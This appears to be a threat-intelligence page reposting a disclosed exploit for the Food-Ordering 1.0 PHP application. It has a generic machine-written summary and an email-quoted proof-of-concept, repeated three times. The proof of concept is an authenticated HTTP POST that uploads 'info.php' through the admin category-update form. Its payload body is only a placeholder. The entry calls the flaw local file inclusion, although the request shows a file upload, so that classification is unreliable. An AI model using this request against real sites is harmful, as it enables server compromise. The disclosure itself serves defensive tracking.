Food-Ordering 1.0 - LFI
Food-Ordering 1.0 contains a Local File Inclusion (LFI) vulnerability. This vulnerability allows an attacker to include files from the local server, potentially exposing sensitive information or enabling further attacks.
AI Analysis
Technical Summary
The Food-Ordering 1.0 application has a Local File Inclusion (LFI) vulnerability. LFI vulnerabilities occur when an application includes files based on user input without proper validation, allowing attackers to read arbitrary files on the server. No specific technical details or affected versions are provided. There is no information about active exploitation in the wild or available patches.
Potential Impact
An attacker exploiting this LFI vulnerability could read sensitive files on the server, which may lead to information disclosure. The extent of impact depends on the server configuration and the files accessible. No confirmed active exploitation or additional impacts are documented.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. In the absence of official fixes, users should restrict file inclusion inputs and validate user-supplied parameters to mitigate exploitation risks.
Indicators of Compromise
- exploit-code: # Title: Food-Ordering 1.0 - LFI # Author: nu11secur1ty # Date: 9/23/2026 # Vendor: https://kato-james.42web.io/?i=2 # Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/2026/Food-Ordering-1.0-kato-james-kalemba # Reference: https://portswigger.net/web-security/file-upload ## Description: A Local File Inclusion (LFI) vulnerability involving parameter values like id=30 often happens when user input is passed directly to file-handling or database-backed file retrieval functions without proper sanitization. When an authenticated user can manipulate this parameter, it can lead to directory traversal, unauthorized access to sensitive files, or full server compromise. STATUS: HIGH [+]Payload: ``` POST /web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg HTTP/1.1 Host: localhost Content-Length: 751 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="151", "Not=A?Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywUgBK3hPWQD0rRB1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36 Origin: http://localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg Accept-Encoding: gzip, deflate, br Cookie: PHPSESSID=v8ietn62kr8ovses41m9ckpvg9 Connection: keep-alive ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="title" ice cream ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="update_image"; filename="info.php" Content-Type: application/octet-stream #### Your EXPLOIT here... ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="submit" update Category ------WebKitFormBoundarywUgBK3hPWQD0rRB1 Content-Disposition: form-data; name="current_image" Category_1790143101.jpg ------WebKitFormBoundarywUgBK3hPWQD0rRB1-- ``` # Reproduce: [href]( https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/2026/Food-Ordering-1.0-kato-james-kalemba ) # Demo: [href](https://odysee.com/@nu11secur1ty:b/Food-Ordering-1.0-LFI) # Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> On Wed, Sep 23, 2026 at 9:46 AM nu11 secur1ty <[email protected]> wrote: > # Title: Food-Ordering-1.0 by Kato James Kalimba | LFI > # Author: nu11secur1ty > # Date: 9/23/2026 > # Vendor: https://kato-james.42web.io/?i=2 > # Software: > # Reference: https://portswigger.net/web-security/file-upload > > ## Description: > A Local File Inclusion (LFI) vulnerability involving parameter values like > id=30 often happens when user input is passed directly to file-handling or > database-backed file retrieval functions without proper sanitization. When > an authenticated user can manipulate this parameter, it can lead to > directory traversal, unauthorized access to sensitive files, or full server > compromise. > > STATUS: HIGH > > > [+]Payload: > ``` > POST > /web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg > HTTP/1.1 > Host: localhost > Content-Length: 751 > Cache-Control: max-age=0 > sec-ch-ua: "Chromium";v="151", "Not=A?Brand";v="99" > sec-ch-ua-mobile: ?0 > sec-ch-ua-platform: "Windows" > Accept-Language: en-US,en;q=0.9 > Upgrade-Insecure-Requests: 1 > Content-Type: multipart/form-data; > boundary=----WebKitFormBoundarywUgBK3hPWQD0rRB1 > User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 > (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36 > Origin: http://localhost > Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 > Sec-Fetch-Site: same-origin > Sec-Fetch-Mode: navigate > Sec-Fetch-User: ?1 > Sec-Fetch-Dest: document > Referer: > http://localhost/web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg > Accept-Encoding: gzip, deflate, br > Cookie: PHPSESSID=v8ietn62kr8ovses41m9ckpvg9 > Connection: keep-alive > > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="title" > > ice cream > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="update_image"; filename="info.php" > Content-Type: application/octet-stream > > #### Your EXPLOIT here... > > > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="featured" > > Yes > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="active" > > Yes > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="submit" > > update Category > ------WebKitFormBoundarywUgBK3hPWQD0rRB1 > Content-Disposition: form-data; name="current_image" > > Category_1790143101.jpg > ------WebKitFormBoundarywUgBK3hPWQD0rRB1-- > > > ``` > > # Reproduce: > [href]( > https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/2026/Food-Ordering-1.0-kato-james-kalemba > ) > > # Demo: > [href](https://odysee.com/@nu11secur1ty:b/Food-Ordering-1.0-LFI) > > # Time spent: > 00:35:00 > > > -- > System Administrator - Infrastructure Engineer > Penetration Testing Engineer > Exploit developer at https://packetstormsecurity.com/ > https://cve.mitre.org/index.html > https://cxsecurity.com/ and https://www.exploit-db.com/ > home page: https://www.asc3t1c-nu11secur1ty.com/ > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= > nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> > > On Wed, Sep 23, 2026 at 9:44 AM nu11 secur1ty < > [email protected]> wrote: > >> # Title: Food-Ordering-1.0 LFI >> # Author: nu11secur1ty >> # Date: 9/23/2026 >> # Vendor: https://kato-james.42web.io/?i=2 >> # Software: >> # Reference: https://portswigger.net/web-security/file-upload >> >> ## Description: >> A Local File Inclusion (LFI) vulnerability involving parameter values >> like id=30 often happens when user input is passed directly to >> file-handling or database-backed file retrieval functions without proper >> sanitization. When an authenticated user can manipulate this parameter, it >> can lead to directory traversal, unauthorized access to sensitive files, or >> full server compromise. >> >> STATUS: HIGH >> >> >> [+]Payload: >> ``` >> POST >> /web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg >> HTTP/1.1 >> Host: localhost >> Content-Length: 751 >> Cache-Control: max-age=0 >> sec-ch-ua: "Chromium";v="151", "Not=A?Brand";v="99" >> sec-ch-ua-mobile: ?0 >> sec-ch-ua-platform: "Windows" >> Accept-Language: en-US,en;q=0.9 >> Upgrade-Insecure-Requests: 1 >> Content-Type: multipart/form-data; >> boundary=----WebKitFormBoundarywUgBK3hPWQD0rRB1 >> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 >> (KHTML, like Gecko) Chrome/151.0.0.0 Safari/537.36 >> Origin: http://localhost >> Accept: >> text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 >> Sec-Fetch-Site: same-origin >> Sec-Fetch-Mode: navigate >> Sec-Fetch-User: ?1 >> Sec-Fetch-Dest: document >> Referer: >> http://localhost/web/admin/update_category.php?id=30&image_name=Category_1790143101.jpg >> Accept-Encoding: gzip, deflate, br >> Cookie: PHPSESSID=v8ietn62kr8ovses41m9ckpvg9 >> Connection: keep-alive >> >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="title" >> >> ice cream >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="update_image"; filename="info.php" >> Content-Type: application/octet-stream >> >> #### Your EXPLOIT here... >> >> >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="featured" >> >> Yes >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="active" >> >> Yes >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="submit" >> >> update Category >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1 >> Content-Disposition: form-data; name="current_image" >> >> Category_1790143101.jpg >> ------WebKitFormBoundarywUgBK3hPWQD0rRB1-- >> >> >> ``` >> >> # Reproduce: >> [href]( >> https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/2026/Food-Ordering-1.0-kato-james-kalemba >> ) >> >> # Demo: >> [href](https://odysee.com/@nu11secur1ty:b/Food-Ordering-1.0-LFI) >> >> # Time spent: >> 00:35:00 >> >> >> -- >> System Administrator - Infrastructure Engineer >> Penetration Testing Engineer >> Exploit developer at https://packetstormsecurity.com/ >> https://cve.mitre.org/index.html >> https://cxsecurity.com/ and https://www.exploit-db.com/ >> home page: https://www.asc3t1c-nu11secur1ty.com/ >> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= >> nu11secur1ty <https://www.asc3t1c-nu11secur1ty.com/> >> >> -- >> >> System Administrator - Infrastructure Engineer >> Penetration Testing Engineer >> Exploit developer at https://packetstorm.news/ >> https://cve.mitre.org/index.html >> https://cxsecurity.com/ and https://www.exploit-db.com/ >> 0day Exploit DataBase https://0day.today/ >> home page: https://www.asc3t1c-nu11secur1ty.com/ >> hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= >> nu11secur1ty <http://nu11secur1ty.com/> >> > > > -- > > System Administrator - Infrastructure Engineer > Penetration Testing Engineer > Exploit developer at https://packetstorm.news/ > https://cve.mitre.org/index.html > https://cxsecurity.com/ and https://www.exploit-db.com/ > 0day Exploit DataBase https://0day.today/ > home page: https://www.asc3t1c-nu11secur1ty.com/ > hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= > nu11secur1ty <http://nu11secur1ty.com/> > -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
Food-Ordering 1.0 - LFI
Description
Food-Ordering 1.0 contains a Local File Inclusion (LFI) vulnerability. This vulnerability allows an attacker to include files from the local server, potentially exposing sensitive information or enabling further attacks.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Food-Ordering 1.0 application has a Local File Inclusion (LFI) vulnerability. LFI vulnerabilities occur when an application includes files based on user input without proper validation, allowing attackers to read arbitrary files on the server. No specific technical details or affected versions are provided. There is no information about active exploitation in the wild or available patches.
Potential Impact
An attacker exploiting this LFI vulnerability could read sensitive files on the server, which may lead to information disclosure. The extent of impact depends on the server configuration and the files accessible. No confirmed active exploitation or additional impacts are documented.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. In the absence of official fixes, users should restrict file inclusion inputs and validate user-supplied parameters to mitigate exploitation risks.
Technical Details
- Vendor
- https://kato-james.42web.io/?i=2
- Author
- nu11secur1ty
- Edb Id
- 52689
- Has Exploit Code
- true
- Code Language
- text
Indicators of Compromise
Exploit Source Code
Exploit code for Food-Ordering 1.0 - LFI
# Title: Food-Ordering 1.0 - LFI # Author: nu11secur1ty # Date: 9/23/2026 # Vendor: https://kato-james.42web.io/?i=2 # Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/2026/Food-Ordering-1.0-kato-james-kalemba # Reference: https://portswigger.net/web-security/file-upload ## Description: A Local File Inclusion (LFI) vulnerability involving parameter values like id=30 often happens when user input is passed directly to file-handling or database-backed file retrieval function... (10401 more characters)
Threat ID: 6abed0b3a43b0b3b8904aa5b
Added to database: 10/01/2026, 21:29:23 UTC
Last enriched: 10/01/2026, 21:29:46 UTC
Last updated: 10/02/2026, 03:55:35 UTC
Views: 11
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.